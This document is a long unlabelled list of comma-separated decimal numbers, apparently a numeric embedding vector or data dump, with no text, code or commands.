-0.0022761281579732895, 0.00037165050162002444, -0.00028936966555193067, -0.004936850164085627, -0.015324573963880539, 0.008645959198474884, 0.0190521739423275, 0.05612107738852501, 0.001113102538511157, -0.043606992810964584, -0.0025590264704078436, -0.007588326930999756, -0.03712807223200798, 0.01103487703949213, -0.010923936031758785, 0.00236118258908391, -0.009148889221251011, -0.017321502789855003, -0.003775673219934106, -0.01500654499977827, 0.024717532098293304, 0.01012516487389803, -0.0006508506485261023, 0.026211529970169067, 0.017454631626605988, -0.0046373107470571995, 0.015679582953453064, 0.009385562501847744, 0.03088582120835781, -0.00481851352378726, 0.012062924914062023, 0.007547648623585701, -0.03618137910962105, -0.013179725036025047, -0.0016770497895777225, 0.007359049748629332, -0.024229394271969795, 0.004955340176820755, -0.02831200323998928, 0.005975992418825626, -0.0023094103671610355, 0.0006864440510980785, -0.02178870514035225, 0.03727599233388901, -0.013778803870081902, 0.02091597206890583, -0.0019802870228886604, -0.023460207507014275, -0.032720036804676056, 0.0037109581753611565, -0.01105706486850977, 0.005606190767139196, -0.009459522552788258, -0.0061054229736328125, -0.02079763635993004, -0.025812145322561264, 0.020013656467199326, -0.002183677861467004, 0.005820675753057003, -0.0036074137315154076, -0.008002504706382751, -0.0068635158240795135, 0.012551062740385532, -0.012196053750813007, -0.00029075643396936357, -0.011559994891285896, -0.020546171814203262, 0.029273487627506256, -0.00633839750662446, -0.0018258949276059866, 0.032779205590486526, 0.00652699638158083, -0.0009434560779482126, -0.02196620963513851, -0.011012688279151917, -0.016108553856611252, -0.010946124792098999, 0.004189851228147745, -0.00764009915292263, -0.006519600283354521, -0.005277067422866821, 0.015797920525074005, 0.010923936031758785, -0.004289697390049696, 0.01862320303916931, -0.02517608553171158, -0.006012972444295883, -0.0028234345372766256, -0.009400353766977787, -0.018519658595323563, 0.016951700672507286, -0.023578543215990067, -0.005173522979021072, 0.007299881428480148, -0.00015982358308974653, 0.01625647395849228, 0.01806110516190529, -0.012869092635810375, 0.00255347928032279, -0.013867556117475033, 0.008076464757323265, 0.009474314749240875, 0.029391823336482048, -0.024406898766756058, -0.012891280464828014, 0.035234685987234116, -0.01647835411131382, 0.018534451723098755, -0.01182625163346529, 0.0028437734581530094, -0.0009448428172618151, 0.0041417768225073814, -0.011160609312355518, -0.029110774397850037, -0.005746715236455202, -0.0009568613604642451, 0.020220745354890823, -0.010472778230905533, 0.018682371824979782, 0.03422882780432701, -0.022424763068556786, -0.0036702798679471016, -0.03186209872364998, 0.01528019830584526, -0.0047334590926766396, -0.010598511435091496, -0.000495533982757479, -0.03082665242254734, -0.018135065212845802, 0.015294990502297878, 0.024214603006839752, -0.004751949105411768, -0.0036943170707672834, -0.01888946071267128, 0.028489507734775543, -0.004138079006224871, 0.004748251289129257, -0.0021189625840634108, -0.01380099169909954, -0.032010018825531006, -0.04200945049524307, -0.00025238952366635203, 0.00416026683524251, 0.028400754556059837, 0.022409971803426743, -0.01390453614294529, 0.01341639831662178, -0.02446606755256653, -0.02934744767844677, -0.017972353845834732, -0.010006828233599663, 0.006856119725853205, -0.03399215266108513, -0.000209746795007959, -0.02042783424258232, 0.01795756071805954, 0.013860160484910011, 0.0018832141067832708, 0.010938728228211403, -0.015176653861999512, -0.002440689830109477, -0.005192012991756201, -0.009163681417703629, -0.0026218926068395376, -0.01680378057062626, 0.004955340176820755, 0.0035630373749881983, 0.0012231185100972652, 0.008394493721425533, -0.024022305384278297, 0.00622745743021369, 0.012343973852694035, -0.01779484748840332, 0.005820675753057003, -0.012957844883203506, -0.007743643596768379, 0.008779088035225868, -0.0007728851633146405, 0.019466351717710495, 0.02081242762506008, -0.007706663105636835, -0.0032838373444974422, 0.009400353766977787, -0.0008842878160066903, 0.013157537207007408, 0.011234569363296032, 0.029169943183660507, -0.012684191577136517, 0.01388234831392765, -0.0035648865159600973, 0.02211412973701954, -0.0015439213020727038, 0.00744780246168375, -0.0009540878818370402, -0.027616776525974274, -0.01812027394771576, 0.009481710381805897, -0.00857199914753437, -0.0002701862249523401, 0.014666327275335789, 0.01850486733019352, -0.012033340521156788, -0.020501794293522835, 0.00148567755240947, 0.006985550280660391, 0.015339366160333157, 0.010265689343214035, 0.01970302313566208, 0.007144565228372812, -0.005373215768486261, 0.00823917705565691, -0.004677989054471254, 0.0011953833745792508, -0.01002162043005228, 0.0025904595386236906, -0.01976219192147255, -0.010243501514196396, -0.016064176335930824, -0.011486034840345383, 0.004411731846630573, 0.018031520769000053, 0.0024554820265620947, 0.01971781626343727, 0.022321218624711037, 0.007617910858243704, 0.0013090972788631916, -0.005018206313252449, -0.014030269347131252, -0.001685370341874659, -0.019910112023353577, 0.006808045785874128, 0.0005745790549553931, -0.00832053367048502, 0.00043128099059686065, 0.019614271819591522, -0.012210845947265625, 0.0005893711349926889, -0.0028437734581530094, -0.00857199914753437, -0.007240713573992252, -0.013601299375295639, 0.016670651733875275, 0.008631167002022266, -0.001447772840037942, -0.009422542527318, -0.007166753057390451, -0.0030878426041454077, -0.011500827036798, 0.018297778442502022, -0.027468854561448097, -0.014303921721875668, 0.005598794668912888, 0.016005009412765503, -0.006686011329293251, 0.0030379192903637886, -0.01998407393693924, 0.005358423572033644, 0.02172953635454178, -0.003246857086196542, -0.009119304828345776, 0.009984640404582024, -0.011929796077311039, 0.0198657363653183, -0.0073997280560433865, 0.007092793006449938, -0.005853957962244749, -0.001593844499439001, -0.0006272757891565561, 0.00878648366779089, 0.007551346439868212, -0.003128520678728819, 0.0035667354241013527, -0.004056722391396761, -0.022188089787960052, -0.019673440605401993, 0.01021391712129116, 0.009725779294967651, 0.017839225009083748, -0.014681119471788406, -0.01576833613216877, -0.012003757059574127, -0.0024129548110067844, -0.017735680565238, 0.0013340589357540011, -0.01426694169640541, 0.00499601848423481, -0.005417591892182827, 0.026152363047003746, 0.022809356451034546, 0.021611200645565987, -0.0006822837749496102, 0.0017944617429748178, 0.002631137613207102, -0.011759688146412373, 0.005606190767139196, -0.024983789771795273, 0.017173580825328827, 0.003409569850191474, -0.019584687426686287, -0.0011491581099107862, 0.0020708884112536907, -0.010273085907101631, 0.009570462629199028, -0.0055026463232934475, -0.008069069124758244, 0.00745889637619257, 0.0037202031817287207, 0.0053029535338282585, -0.0013664165744557977, -0.01674461178481579, -0.015161861665546894, 0.003145161783322692, -0.00613130908459425, 0.0000834364618640393, -0.006634239107370377, -0.00640866020694375, 0.016448771581053734, -0.009674007073044777, -0.019998865202069283, 0.03088582120835781, -0.01078341156244278, -0.012225637212395668, -0.025767767801880836, 0.002577516483142972, 0.00014826729602646083, 0.0175285916775465, 0.011515618301928043, 0.012861696071922779, 0.0050736768171191216, -0.005277067422866821, -0.0030397684313356876, 0.0022446950897574425, 0.0002676438307389617, -0.023282703012228012, 0.018430907279253006, -0.0011020085075870156, 0.015036129392683506, -0.0050699785351753235, -0.008416682481765747, 0.005265973508358002, -0.0033319115173071623, -0.010539342649281025, -0.011641351506114006, 0.0010835183784365654, -0.015812711790204048, -0.026374243199825287, 0.011486034840345383, -0.025264838710427284, 0.0020117200911045074, -0.0006956890574656427, 0.009208057075738907, 0.002523895353078842, 0.01141947042196989, -0.006416055839508772, -0.01840132288634777, 0.019288845360279083, 0.00936337374150753, 0.004016044083982706, -0.003313421504572034, -0.004940547980368137, -0.00433777179569006, 0.038459356874227524, -0.00009620617493055761, 0.011123629286885262, -0.019836151972413063, -0.00354454736225307, -0.005114354658871889, -0.011951984837651253, -0.028622636571526527, -0.02764636091887951, -0.005480458028614521, 0.004629914648830891, 0.011929796077311039, -0.0041750590316951275, 0.002043153392150998, 0.02359333634376526, -0.009392958134412766, 0.016019800677895546, -0.02267622761428356, 0.0006610201671719551, -0.000697075854986906, -0.010753828100860119, -0.0026034025941044092, 0.004770439583808184, 0.008653354831039906, 0.008823463693261147, -0.0011057064402848482, 0.021211814135313034, -0.008808671496808529, 0.008542414754629135, 0.019732607528567314, -0.00008730782428756356, -0.025871312245726585, -0.0009550123941153288, -0.01718837395310402, 0.015783127397298813, 0.02162599191069603, 0.007721455302089453, -0.019229678437113762, -0.011959380470216274, -0.0022927692625671625, -0.013830576092004776, 0.010310065932571888, 0.018416114151477814, -0.007780623622238636, 0.0044709001667797565, -0.020546171814203262, 0.002043153392150998, -0.010250897146761417, 0.009777551516890526, -0.0007345182239077985, 0.00718524307012558, 0.008261365815997124, -0.0012443820014595985, -0.00689679803326726, -0.018963420763611794, 0.006552882492542267, 0.015516870655119419, 0.019732607528567314, -0.0003402173751965165, 0.008061672560870647, -0.04393241927027702, -0.01619730517268181, 0.022350803017616272, -0.009052740409970284, 0.01625647395849228, 0.0017177279805764556, 0.003420663997530937, 0.0004701101570390165, 0.017927976325154305, -0.0018582525663077831, 0.010960916057229042, 0.010546739213168621, -0.003690619021654129, 0.014296526089310646, -0.005025602411478758, 0.0008186480845324695, 0.00425641518086195, 0.01801672950387001, 0.0017750471597537398, -0.014525802806019783, 0.005776299629360437, -0.008890028111636639, 0.007536554709076881, 0.022587476298213005, -0.005713433027267456, -0.016034593805670738, -0.0012416085228323936, 0.009400353766977787, -0.0022872223053127527, 0.005032998509705067, 0.010620699264109135, 0.02326790988445282, -0.00017970042244996876, -0.021093478426337242, -0.000846383161842823, 0.019569896161556244, 0.012706379406154156, 0.0006309738382697105, -0.0059353141114115715, -0.000020165738533250988, -0.009355978108942509, 0.0028863006737083197, -0.03307504579424858, 0.006734085269272327, -0.03538260608911514, 0.01637480966746807, 0.007921148091554642, -0.013127953745424747, -0.02780907228589058, 0.017661720514297485, -0.0008519302355125546, -0.002954714000225067, -0.010531947016716003, 0.01021391712129116, -0.003505718195810914, -0.02195141650736332, 0.027394894510507584, 0.0008792030857875943, -0.01371223945170641, 0.022025376558303833, -0.0024388409219682217, 0.01037663035094738, 0.012151677161455154, 0.02288331650197506, 0.010221313685178757, 0.019939696416258812, 0.027616776525974274, 0.003089691512286663, 0.032838374376297, 0.03050122782588005, 0.02556067891418934, 0.005162429064512253, 0.011648747138679028, -0.003122973721474409, -0.018904251977801323, -0.000726197671610862, 0.021921832114458084, 0.014481427147984505, 0.008867840282619, 0.02875576540827751, 0.011271549388766289, -0.005369517952203751, 0.0028548676054924726, 0.010139957070350647, -0.02266143634915352, 0.003609262639656663, -0.01631564274430275, -0.011027480475604534, -0.0012711926829069853, 0.03070831671357155, -0.002192922867834568, 0.009097116999328136, 0.016877740621566772, 0.003820049576461315, -0.004922057967633009, 0.006667520850896835, -0.024939414113759995, 0.008505434729158878, -0.007336861919611692, -0.03650680556893349, -0.023948345333337784, 0.02113785408437252, 0.004034534562379122, -0.0017805942334234715, 0.004156569018959999, -0.005498948507010937, -0.028607843443751335, -0.016877740621566772, -0.004910964053124189, 0.015457702800631523, 0.012432726100087166, 0.012713775970041752, 0.007566138636320829, 0.005362121853977442, -0.002111566485837102, -0.016167720779776573, 0.0006577844033017755, -0.028652220964431763, 0.010628094896674156, -0.012196053750813007, 0.010613302700221539, -0.004496786277741194, -0.0043007913045585155, 0.013512547127902508, -0.0003346703597344458, -0.005484156310558319, -0.008608979173004627, 0.02825283445417881, 0.005635774694383144, 0.012854300439357758, -0.020161578431725502, -0.025427551940083504, -0.03070831671357155, 0.011027480475604534, -0.010443194769322872, -0.01856403611600399, -0.013601299375295639, 0.015235821716487408, -0.01369005162268877, -0.008712523616850376, -0.029362238943576813, -0.014052457176148891, -0.01481424830853939, -0.005447176285088062, -0.0007936864858493209, -0.018771125003695488, -0.0030379192903637886, 0.002353786490857601, -0.005351027939468622, -0.03535302355885506, -0.02786824107170105, 0.005450874101370573, 0.001661333255469799, -0.006138704717159271, -0.00013347523054108024, 0.007218525279313326, 0.0016520882491022348, 0.00373684405349195, 0.020723676308989525, 0.014999148435890675, -0.0001928745914483443, 0.005987086333334446, -0.017232749611139297, -0.03783809021115303, -0.009318998083472252, 0.013764011673629284, -0.00034876904101110995, 0.011071857064962387, -0.017010869458317757, 0.0026773628778755665, -0.006286625284701586, -0.011493430472910404, 0.011759688146412373, -0.008853048086166382, -0.016138138249516487, 0.024525236338377, 0.005890937987715006, -0.0033337604254484177, 0.017706096172332764, 0.007421916350722313, -0.018978213891386986, -0.02316436544060707, 0.0016151081072166562, -0.022972069680690765, 0.00837970245629549, 0.01037663035094738, -0.008098652586340904, -0.025664223358035088, 0.019007796421647072, 0.009407750330865383, 0.0038755196146667004, 0.003111879574134946, 0.0014921490801498294, -0.013948912732303143, -0.012551062740385532, -0.01888946071267128, 0.01254366710782051, -0.037749338895082474, 0.01599021628499031, 0.031566254794597626, -0.00150971463881433, 0.010827788151800632, 0.0007641023257747293, 0.009148889221251011, 0.008180009201169014, -0.005399101879447699, 0.009585254825651646, -0.0020505492575466633, 0.017883600667119026, 0.013830576092004776, 0.009052740409970284, -0.005783695261925459, -0.006944871973246336, 0.023830009624361992, -0.002560875378549099, 0.01031746156513691, 0.020546171814203262, 0.018859876319766045, -0.005709735210984945, 0.001377510605379939, -0.0036924679297953844, -0.008830860257148743, -0.014666327275335789, 0.003418814856559038, 0.00651590246707201, 0.00008632554090581834, 0.007421916350722313, -0.01954031176865101, 0.007617910858243704, 0.005088468547910452, -0.007654890883713961, 0.013068784959614277, -0.006626843009144068, -0.016300849616527557, -0.0026071006432175636, 0.008882632479071617, 0.005362121853977442, -0.0002184140175813809, 0.011552599258720875, -0.033104632049798965, 0.019510727375745773, 0.0017066339496523142, -0.01686294935643673, 0.004119588527828455, -0.006674916949123144, 0.002329749520868063, -0.002337145386263728, -0.007625306956470013, -0.009355978108942509, -0.02359333634376526, -0.021833080798387527, -0.0006915287813171744, -0.006319907493889332, 0.022602267563343048, 0.005277067422866821, -0.012580647133290768, -0.007928543724119663, -0.031832512468099594, -0.012943052686750889, -0.025752976536750793, 0.015324573963880539, -0.01010297704488039, 0.020191162824630737, 0.003143312642350793, -0.023401038721203804, -0.005406497977674007, 0.016448771581053734, 0.005136542953550816, 0.015516870655119419, 0.02124139852821827, -0.012380953878164291, -0.030294138938188553, 0.015095297247171402, -0.018090689554810524, 0.013653071597218513, 0.011131024919450283, -0.009392958134412766, 0.007817603647708893, -0.02995392121374607, 0.007684475276619196, 0.014784663915634155, -0.00614610081538558, -0.005957502406090498, -0.02683279663324356, 0.006856119725853205, -0.00889742374420166, -0.004489390179514885, -0.01992490515112877, 0.013238893821835518, -0.0042083412408828735, -0.009925472550094128, -0.008461058139801025, 0.005979690235108137, 0.02458440326154232, -0.012684191577136517, -0.009814531542360783, -0.016108553856611252, 0.019673440605401993, -0.01122717373073101, 0.014385278336703777, -0.017750471830368042, 0.02502816542983055, 0.0017177279805764556, -0.009067532606422901, -0.02184787206351757, 0.007706663105636835, -0.008542414754629135, -0.005236389115452766, 0.006120214704424143, -0.0014995450619608164, -0.013971100561320782, 0.010724243707954884, 0.016078969463706017, -0.006216363050043583, -0.015442910604178905, 0.0011251210235059261, 0.01933322288095951, 0.00717414915561676, 0.02683279663324356, 0.01122717373073101, 0.0005718055763281882, -0.018105480819940567, 0.02227684296667576, 0.021167438477277756, 0.01417818944901228, -0.023134781047701836, 0.008756899274885654, 0.010968312621116638, 0.012218241579830647, -0.014377882704138756, 0.013978497125208378, -0.0029010928701609373, -0.0504705086350441, 0.02267622761428356, -0.006686011329293251, 0.009703591465950012, 0.017987145110964775, 0.014629347249865532, 0.027838656678795815, 0.015857087448239326, 0.02091597206890583, -0.0020616434048861265, 0.0029343748465180397, 0.0017731982516124845, 0.008409285917878151, -0.011190193705260754, -0.009962452575564384, -0.03307504579424858, 0.012728567235171795, 0.019910112023353577, -0.00364069570787251, -0.018001936376094818, 0.009688799269497395, -0.00985151156783104, 0.019643856212496758, -0.008468454703688622, -0.004814815707504749, -0.01670023612678051, -0.012514082714915276, 0.01686294935643673, 0.012432726100087166, 0.010620699264109135, 0.015753544867038727, 0.025930481031537056, 0.007743643596768379, -0.009148889221251011, -0.02590089663863182, 0.02026512287557125, -0.01511008944362402, 0.007170450873672962, 0.004260113462805748, -0.012854300439357758, 0.0012499290751293302, -0.007617910858243704, 0.002523895353078842, 0.010561530478298664, 0.015398534946143627, -0.01218126155436039, 0.0028400756418704987, 0.007048416417092085, -0.007921148091554642, -0.028652220964431763, -0.022764980792999268, 0.012772943824529648, -0.013911932706832886, -0.011559994891285896, -0.013105764985084534, 0.0209751408547163, 0.015442910604178905, -0.007773227524012327, 0.0005047790473327041, -0.001457017962820828, -0.004522672388702631, 0.01769130304455757, 0.017720887437462807, -0.008668147027492523, -0.010243501514196396, -0.004186152946203947, 0.007921148091554642, -0.0019895320292562246, -0.01911134086549282, 0.026921549811959267, -0.00395687622949481, 0.023016445338726044, -0.02868180349469185, -0.020960349589586258, 0.0279717855155468, 0.018031520769000053, 0.03579678386449814, -0.012343973852694035, 0.006663823034614325, -0.028933269903063774, -0.005018206313252449, -0.003905103774741292, 0.007026228588074446, -0.0009698044159449637, -0.006530694663524628, -0.005328839644789696, 0.00008707669621799141, -0.035678450018167496, 0.006985550280660391, -0.003945781849324703, -0.009762759320437908, -0.016818571835756302, -0.02042783424258232, 0.0011833647731691599, -0.00919326487928629, 0.027128638699650764, -0.014584971591830254, 0.019895320758223534, -0.006331001874059439, 0.002176281763240695, 0.01566479168832302, 0.02348979189991951, -0.01407464500516653, 0.01360869500786066, -0.02841554768383503, -0.011404678225517273, 0.018771125003695488, -0.007795415818691254, -0.007181545253843069, -0.005051488522440195, -0.01283950824290514, 0.002353786490857601, -0.0022872223053127527, -0.023667296394705772, 0.009947660379111767, -0.008697731420397758, -0.009511294774711132, 0.0005033923080191016, 0.005791091360151768, -0.020368667319417, -0.014444446191191673, 0.016226889565587044, 0.000017883368855109438, -0.01692211627960205, 0.005151334684342146, -0.007004040293395519, 0.003089691512286663, 0.005887239705771208, 0.021670367568731308, -0.013475567102432251, 0.026403827592730522, 0.02721739001572132, 0.004507880192250013, -0.0005329764098860323, 0.007669683080166578, -0.001197232399135828, 0.000838987180031836, 0.005894635803997517, 0.0004770439409185201, 0.004012346267700195, 0.017499007284641266, 0.0025423853658139706, -0.000015904353858786635, -0.00820959359407425, -0.001216646982356906, 0.0002815113984979689, 0.02968766540288925, -0.011079252697527409, 0.0060610463842749596, -0.002128207590430975, -0.010827788151800632, -0.0122626181691885, 0.0027476251125335693, -0.016877740621566772, -0.010561530478298664, -0.00840189028531313, -0.0007220374536700547, 0.003376287641003728, -0.0029732040129601955, 0.01349775493144989, 0.013727031648159027, 0.03301587700843811, 0.00020916896755807102, -0.003897707909345627, -0.009844115935266018, -0.003065654542297125, 0.013623487204313278, 0.0017510100733488798, -0.02983558550477028, -0.0070003424771130085, -0.006841327995061874, 0.030915405601263046, -0.0009781250264495611, -0.0025590264704078436, 0.022483931854367256, 0.007751039229333401, 0.008586790412664413, -0.023578543215990067, -0.002130056731402874, -0.009222849272191525, 0.013320250436663628, 0.002943619852885604, -0.006319907493889332, -0.005406497977674007, 0.003359646536409855, 0.019140925258398056, 0.016108553856611252, -0.021123060956597328, 0.014718099497258663, 0.00307305040769279, 0.004278603475540876, 0.008394493721425533, -0.005916824098676443, -0.014666327275335789, -0.007318371906876564, -0.024599196389317513, -0.011367698200047016, -0.0036850720643997192, -0.0004303565074224025, -0.026803212240338326, 0.0008537792018614709, 0.0035334534477442503, 0.05567731335759163, 0.009119304828345776, -0.009984640404582024, 0.004929454065859318, 0.008431474678218365, -0.008165217004716396, -0.004012346267700195, 0.02551630325615406, -0.0067673674784600735, -0.020901180803775787, 0.018741540610790253, 0.0028715087100863457, 0.005813279654830694, 0.02272060513496399, 0.010110372677445412, -0.0011269700480625033, 0.00585765577852726, -0.0009342110133729875, -0.0033744387328624725, -0.0044339201413095, 0.015442910604178905, 0.020679300650954247, 0.016212098300457, 0.0076622869819402695, -0.004844399634748697, 0.000016742185835028067, -0.004293395206332207, -0.004740855190902948, 0.008165217004716396, -0.02474711649119854, -0.005916824098676443, 0.00016190372116398066, 0.01625647395849228, 0.011700519360601902, -0.038784779608249664, 0.008653354831039906, -0.012284805998206139, -0.01931842975318432, -0.001961797010153532, 0.002695852890610695, -0.008120841346681118, 0.011463846080005169, 0.01736587844789028, 0.018164649605751038, -0.016567107290029526, 0.012114697135984898, 0.019954489544034004, 0.009962452575564384, 0.015139673836529255, -0.014133813790977001, -0.0326312854886055, 0.00492575578391552, 0.008372305892407894, -0.01152301486581564, -0.013046597130596638, -0.004297093488276005, -0.02409626543521881, -0.005347329657524824, -0.009644422680139542, 0.008690334856510162, 0.01917050965130329, 0.0017990842461585999, 0.01696649193763733, 0.0037017129361629486, 0.007344258017838001, -0.001853630063124001, 0.007669683080166578, -0.017395462840795517, -0.009259829297661781, -0.0057319230400025845, -0.005983388517051935, -0.019510727375745773, -0.019510727375745773, -0.010835183784365654, -0.013401606120169163, 0.0010567078134045005, 0.023726465180516243, -0.0005496174562722445, 0.009873700328171253, -0.0046410090290009975, 0.00472236517816782, -0.007499574217945337, 0.016685442999005318, -0.021418903023004532, -0.010413610376417637, -0.008749503642320633, 0.0001288527128053829, 0.013630883768200874, 0.020013656467199326, -0.008875235915184021, -0.01566479168832302, 0.006660125218331814, 0.008838255889713764, 0.012536270543932915, -0.0243181474506855, -0.0005375989130698144, -0.006064744666218758, -0.004189851228147745, -0.013623487204313278, -0.006589862518012524, -0.001736217993311584, 0.006482620257884264, 0.015265406109392643, 0.019732607528567314, 0.01160437148064375, 0.001664106734097004, 0.020827220752835274, 0.020294707268476486, -0.020930765196681023, 0.011449054814875126, 0.015797920525074005, -0.0042712073773145676, -0.012070320546627045, -0.01686294935643673, 0.0007691871142014861, 0.007595723029226065, -0.00878648366779089, -0.0026071006432175636, -0.000019154562323819846, 0.018105480819940567, 0.016108553856611252, -0.02748364768922329, -0.014126417227089405, 0.004881379660218954, -0.012003757059574127, 0.006264437455683947, 0.0012342125410214067, 0.007965524680912495, -0.0000908324946067296, -0.010302669368684292, -0.0011214230908080935, 0.007244411390274763, 0.019303638488054276, -0.01878591626882553, -0.022143714129924774, 0.043666161596775055, -0.0027328331489115953, 0.01161176711320877, -0.003339307615533471, 0.011182797141373158, 0.020768051967024803, 0.022247258573770523, -0.017942769452929497, 0.01084258034825325, -0.014340901747345924, -0.00032634983654133976, 0.014688516035676003, 0.00985151156783104, 0.0015180351911112666, -0.023149574175477028, -0.018933836370706558, -0.003997554071247578, -0.01674461178481579, -0.01894862949848175, -0.009762759320437908, -0.020827220752835274, -0.004578142426908016, -0.005602492950856686, 0.021389318630099297, 0.010162144899368286, 0.019022589549422264, 0.01856403611600399, -0.020901180803775787, 0.0032930823508650064, 0.0013331343652680516, 0.018652787432074547, 0.00481851352378726, -0.0017371425637975335, 0.0007613288471475244, -0.013394210487604141, 0.023726465180516243, 0.0009060136508196592, -0.005680151283740997, 0.006815441884100437, -0.003387381788343191, 0.009474314749240875, -0.006478922441601753, 0.009844115935266018, 0.01541332621127367, -0.0016225040890276432, 0.004041930194944143, 0.0038533315528184175, -0.001776896184310317, -0.002440689830109477, -0.012233033776283264, -0.022543098777532578, -0.005694943014532328, 0.022409971803426743, 0.010347045958042145, -0.012062924914062023, -0.023534167557954788, -0.0067969514057040215, 0.005243785213679075, 0.003890311811119318, 0.010494966991245747, 0.0065380907617509365, -0.013298061676323414, -0.019481142982840538, -0.015139673836529255, -0.02172953635454178, -0.006841327995061874, -0.009585254825651646, 0.008867840282619, -0.000217027249163948, 0.0004983075195923448, -0.00037165050162002444, -0.000009035579751071054, -0.016522731631994247, -0.0005186466150917113, 0.02081242762506008, 0.025930481031537056, -0.022764980792999268, -0.014185586012899876, 0.010287878103554249, 0.013024409301578999, -0.012136884965002537, -0.01445184275507927, 0.029524952173233032, -0.004907265771180391, -0.01664106734097004, 0.012062924914062023, -0.027735112234950066, 0.010110372677445412, -0.0007678003748878837, 0.017321502789855003, 0.007847188040614128, -0.0012277410132810473, 0.007677079178392887, -0.0035907726269215345, -0.008061672560870647, -0.0022927692625671625, 0.017040453851222992, 0.003034221241250634, -0.0028659615200012922, 0.03372589871287346, 0.0023001653607934713, 0.020516587421298027, 0.015117485076189041, 0.0046410090290009975, 0.008749503642320633, 0.005776299629360437, 0.0023574845399707556, 0.017425047233700752, -0.010672471486032009, 0.012595439329743385, 0.005110656842589378, -0.009600047022104263, -0.003529755398631096, 0.013039200566709042, 0.010110372677445412, 0.027010301128029823, 0.00006269291043281555, 0.002993543166667223, 0.018578827381134033, -0.01838652975857258, -0.011855836026370525, -0.003435455961152911, -0.009807135909795761, -0.012003757059574127, -0.017484214156866074, 0.009577859193086624, 0.01812027394771576, -0.024510443210601807, -0.005195711273699999, 0.023445414379239082, 0.0035796784795820713, -0.019007796421647072, -0.008749503642320633, 0.006922684144228697, -0.019969280809164047, 0.015161861665546894, -0.0014218867290765047, 0.015590831637382507, 0.010665074922144413, 0.00024152660625986755, -0.006678615231066942, -0.012270013801753521, -0.0028659615200012922, -0.014059852808713913, 0.025501511991024017, -0.019998865202069283, 0.00745889637619257, 0.001132517121732235, 0.01566479168832302, -0.007788019720464945, 0.015960631892085075, 0.0004992320318706334, 0.0023741256445646286, 0.01763213612139225, 0.006031462457031012, -0.000021018015104345977, -0.019066965207457542, 0.006671219132840633, 0.0035685845650732517, -0.00698185246437788, 0.022040169686079025, 0.030589981004595757, -0.013482962734997272, 0.010147353634238243, 0.02496899664402008, -0.001096461433917284, -0.005428685806691647, -0.021759120747447014, 0.010435798205435276, -0.00434146961197257, 0.009984640404582024, 0.017262334004044533, 0.0004932227311655879, -0.013845368288457394, -0.014821643941104412, 0.004855493549257517, 0.029850376769900322, 0.00434146961197257, 0.007318371906876564, -0.02667008340358734, 0.013956308364868164, -0.0063051157630980015, 0.023415831848978996, -0.004955340176820755, 0.01076122373342514, -0.009415145963430405, -0.0066009568981826305, 0.018001936376094818, 0.002290920354425907, -0.005939011927694082, -0.006279229652136564, 0.011064460501074791, -0.02277977205812931, -0.01557603944092989, -0.006512204650789499, -0.006142402999103069, 0.0013349833898246288, 0.011027480475604534, -0.012521479278802872, -0.010798203758895397, 0.008342721499502659, 0.003657336812466383, 0.01911134086549282, -0.02178870514035225, -0.013734427280724049, 0.0022114128805696964, 0.0020597942639142275, -0.004134380724281073, -0.0020838314667344093, -0.004215737339109182, -0.0016437676968052983, 0.008668147027492523, 0.020191162824630737, 0.008483245968818665, 0.007699267473071814, -0.008875235915184021, -0.0011454601772129536, 0.012898676097393036, 0.020945556461811066, 0.016788987442851067, -0.016286058351397514, 0.01207771711051464, 0.0014949225587770343, -0.013209309428930283, -0.015324573963880539, 0.0053658196702599525, -0.0122626181691885, 0.019732607528567314, -0.000930513022467494, -0.004951641894876957, -0.0017140299314633012, -0.0068635158240795135, -0.011286341585218906, 0.0216851606965065, 0.012943052686750889, -0.0018480829894542694, 0.005506344139575958, -0.004230529069900513, 0.005779997445642948, 0.00006881774606881663, -0.020353874191641808, -0.013704843819141388, 0.02113785408437252, 0.00955567043274641, 0.022202882915735245, 0.00919326487928629, 0.036980148404836655, 0.032276276499032974, -0.016300849616527557, -0.0021319056395441294, 0.026462994515895844, 0.02705467864871025, -0.0030231273267418146, 0.010250897146761417, -0.006416055839508772, -0.014747683890163898, 0.014392673969268799, 0.012491894885897636, 0.01714399829506874, 0.0021356036886572838, 0.009925472550094128, 0.005543324630707502, -0.002425897866487503, 0.006608352996408939, -0.011094044893980026, 0.0028289814945310354, -0.006464130245149136, 0.003905103774741292, 0.020679300650954247, 0.00783239584416151, 0.0026385337114334106, -0.000726197671610862, 0.015753544867038727, 0.018194233998656273, -0.016212098300457, -0.018534451723098755, -0.016788987442851067, 0.033755481243133545, 0.020368667319417, -0.03354839235544205, 0.006978154182434082, 0.001945155905559659, -0.023519376292824745, -0.011404678225517273, 0.008039484731853008, -0.010088184848427773, -0.014422258362174034, -0.013105764985084534, 0.01437048614025116, -0.010206521488726139, 0.017380669713020325, -0.001156554208137095, -0.0042046429589390755, 0.005236389115452766, -0.009148889221251011, -0.012270013801753521, 0.007810207549482584, 0.0005172598757781088, -0.001356246997602284, -0.018549242988228798, -0.013372022658586502, -0.0175285916775465, 0.01343858614563942, -0.0006771989865228534, 0.006423451937735081, -0.01341639831662178, 0.018697163090109825, -0.009600047022104263, 0.0015522418543696404, -0.022809356451034546, -0.0028197364881634712, -0.0009661064250394702, 0.0036943170707672834, -0.03603345900774002, 0.004078910686075687, 0.010598511435091496, 0.013630883768200874, 0.020782845094799995, -0.001252702553756535, -0.009318998083472252, -0.02419980987906456, -0.017780056223273277, 0.02377084083855152, 0.004049326293170452, -0.0017593306256458163, -0.01324628945440054, -0.004348865710198879, -0.0010058600455522537, 0.0004234227235428989, 0.005787393543869257, 0.01248449832201004, 0.005458270199596882, 0.0023186553735285997, 0.012772943824529648, 0.020842012017965317, 0.00037396178231574595, 0.002695852890610695, 0.023534167557954788, -0.014444446191191673, -0.000029425220418488607, 0.004234227351844311, -0.010339650325477123, -0.003760881256312132, -0.011574787087738514, -0.009437334723770618, 0.01785401627421379, -0.006848723627626896, -0.005110656842589378, -0.017232749611139297, -0.0023038634099066257, -0.013098369352519512, 0.03378506377339363, 0.01872674748301506, 0.00416026683524251, -0.010554134845733643, 0.0006698029465042055, -0.02026512287557125, 0.007248109206557274, 0.011486034840345383, 0.0060610463842749596, 0.0018083293689414859, -0.023948345333337784, 0.011900212615728378, -0.0039125001057982445, 0.0027161920443177223, -0.03307504579424858, -0.03295670822262764, -0.001904477714560926, 0.00015496993728447706, -0.022424763068556786, 0.0016733517404645681, 0.02162599191069603, -0.0037349951453506947, 0.004796325694769621, -0.015294990502297878, 0.016833364963531494, -0.022483931854367256, 0.01275815162807703, -0.001993230078369379, 0.0027254370506852865, 0.011012688279151917, -0.003642544848844409, 0.009969848208129406, 0.007022530306130648, 